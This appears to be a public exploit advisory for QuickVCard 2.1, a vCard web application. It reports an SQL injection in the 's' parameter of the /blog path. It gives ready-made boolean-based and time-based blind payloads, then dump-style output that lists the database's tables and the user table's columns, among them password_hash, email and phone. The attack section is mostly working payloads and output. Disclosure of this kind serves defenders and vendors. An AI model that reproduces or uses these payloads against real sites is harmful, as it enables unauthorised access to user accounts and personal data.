Share
## https://sploitus.com/exploit?id=PACKETSTORM:173377
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ C r a C k E r โโ
โโ T H E C R A C K O F E T E R N A L M I G H T โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโ From The Ashes and Dust Rises An Unimaginable crack.... โโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ [ Vulnerability ] โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
: Author : CraCkEr :
โ Website : https://quickvcard.by-code.com/ โ
โ Vendor : bylancer โ
โ Software : QuickVCard 2.1 โ
โ Vuln Type: SQL Injection โ
โ Impact : Database Access โ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
: :
โ Release Notes: โ
โ โโโโโโโโโโโโโ โ
โ โ
โ SQL injection attacks can allow unauthorized access to sensitive data, modification of โ
โ data and crash the application or make it unavailable, leading to lost revenue and โ
โ damage to a company's reputation. โ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09
CryptoJob (Twitter) twitter.com/0x0CryptoJob
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ ยฉ CraCkEr 2023 โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Path: /blog
https://website/blog?s=[SQLI]
GET parameter 's' is vulnerable to SQL Injection
---
Parameter: s (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: s=123') OR 02449=2449 OR ('04586'='4586
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (IF - comment)
Payload: s=123'XOR(IF(now()=sysdate(),SLEEP(5),0))XOR'Z
---
[+] Starting the Attack
fetching current database
current database: 'quickvcardcode_**'
fetching tables
[27 tables]
+----------------------+
| vc_upgrades |
| vc_languages |
| vc_balance |
| vc_transaction |
| vc_vcard_options |
| vc_payments |
| vc_time_zones |
| vc_user |
| vc_plans |
| vc_user_options |
| vc_faq_entries |
| vc_admins |
| vc_vcards |
| vc_blog_cat_relation |
| vc_vcard_view |
| vc_blog_categories |
| vc_testimonials |
| vc_blog |
| vc_subscriber |
| vc_blog_comment |
| vc_logs |
| vc_countries |
| vc_taxes |
| vc_options |
| vc_currencies |
| vc_plan_options |
| vc_pages |
+----------------------+
fetching columns for Table: vc_user
[47 columns]
+----------------+
| id |
| group_id |
| username |
| user_type |
| balance |
| password_hash |
| forgot |
| confirm |
| email |
| status |
| view |
| created_at |
| updated_at |
| name |
| tagline |
| description |
| dob |
| salary_min |
| salary_max |
| category |
| subcategory |
| website |
| sex |
| phone |
| postcode |
| address |
| country |
| city |
| city_code |
| state_code |
| country_code |
| image |
| lastactive |
| facebook |
| twitter |
| googleplus |
| instagram |
| linkedin |
| youtube |
| oauth_provider |
| oauth_uid |
| oauth_link |
| online |
| notify |
| notify_cat |
| currency |
| menu_layout |
+----------------+
[-] Done